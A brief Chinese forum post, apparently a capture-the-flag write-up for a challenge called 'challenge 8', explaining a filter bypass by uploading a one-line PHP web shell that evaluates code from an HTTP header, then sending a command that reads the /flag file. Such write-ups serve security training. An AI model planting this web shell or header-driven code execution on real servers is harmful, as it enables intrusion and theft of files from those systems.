首页
社区
课程
招聘
[原创]第八题 牛刀小试
2020-5-5 21:03 4749

[原创]第八题 牛刀小试

2020-5-5 21:03
4749

image-20200505205012978

 

因为有过滤所以使用无参数

 

rce{"data":"<?php eval(current(getallheaders())) ?>"}

 

image-20200505205039915

 

上传文件以后 无参数rce是执行headers 里面的参数。

 

echo file_get_contents("/flag");

 

image-20200505205057362

 

image-20200505205102306


[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回